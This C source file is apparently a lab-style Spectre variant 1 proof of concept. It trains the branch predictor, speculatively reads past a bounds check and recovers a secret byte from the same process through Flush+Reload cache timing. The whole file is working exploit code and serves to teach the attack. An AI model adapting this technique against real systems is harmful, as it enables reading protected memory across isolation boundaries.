#include <emmintrin.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>

unsigned int buffer_size = 10;
uint8_t buffer[10] = {0,1,2,3,4,5,6,7,8,9}; 
uint8_t temp = 0;
char *secret = "secreto";   
uint8_t array[256*4096];

#define CACHE_HIT_THRESHOLD (100)
#define DELTA 1024

// Sandbox 
uint8_t restrictedAccess(size_t x)
{
  if (x < buffer_size) {
     return buffer[x];
  } else {
     return 0;
  } 
}

void flushSideChannel()
{
  int i;
  
  for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;
  for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 +DELTA]);
}

static int scores[256];
void reloadSideChannelImproved()
{
int i;
  volatile uint8_t *addr;
  register uint64_t time1, time2;
  int junk = 0;
  for (i = 0; i < 256; i++) {
    addr = &array[i * 4096 + DELTA];
    time1 = __rdtscp(&junk);
    junk = *addr;
    time2 = __rdtscp(&junk) - time1;
    if (time2 <= CACHE_HIT_THRESHOLD)
      if (i!=0) { scores[i]++; } // Incrementar contador
  } 
}

void spectreAttack(size_t larger_x)
{
  int i, j;
  uint8_t s;
  volatile int z;
  for (i = 0; i < 256; i++)  { _mm_clflush(&array[i*4096 + DELTA]); }
  // Enseñar a la CPU
  for (j=0; j<200; j++) {
  	for (i = 0; i < 10; i++) {
    		_mm_clflush(&buffer_size);
    		for (z = 0; z < 100; z++) { }
    		restrictedAccess(i);  
  	}
  }
  // FLUSH buffer_size y array[] de la caché
  _mm_clflush(&buffer_size);
  for (i = 0; i < 256; i++)  { _mm_clflush(&array[i*4096 + DELTA]); }
  // Devolver de victim() el secreto de la ejecución out-of-order
  for (z = 0; z < 100; z++) { }
  s = restrictedAccess(larger_x);
  array[s*4096 + DELTA] += 88;
}

int main() {
  int i;
  uint8_t s;
  size_t larger_x = (size_t)(secret-(char*)buffer);
  flushSideChannel();
  for(i=0;i<256; i++) scores[i]=0; 
  for (i = 0; i < 1000; i++) {
    spectreAttack(larger_x);
    reloadSideChannelImproved();
  }
  int max = 0;
  for (i = 0; i < 256; i++){
   if(scores[max] < scores[i])  
     max = i;
  }
  printf("Secreto leído en %p\n", (void*)larger_x);
  printf("Valor del secreto: %d -> '%c'\n", max, max);
  printf("Cache hits: %d\n", scores[max]);
  return (0); 
}


